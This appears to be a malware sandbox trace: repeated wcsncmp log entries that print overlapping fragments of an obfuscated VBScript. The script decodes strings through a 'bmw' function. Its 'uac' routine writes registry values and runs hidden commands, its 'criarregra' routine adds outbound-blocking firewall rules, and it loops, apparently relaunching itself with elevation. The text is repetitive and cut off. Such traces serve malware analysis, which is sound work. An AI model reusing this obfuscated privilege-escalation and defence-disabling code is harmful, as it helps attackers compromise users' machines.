bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.349] wcsncmp (_String1="led = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.349] wcsncmp (_String1="ed = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.349] wcsncmp (_String1="d = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.349] wcsncmp (_String1=" = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.349] wcsncmp (_String1="= false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 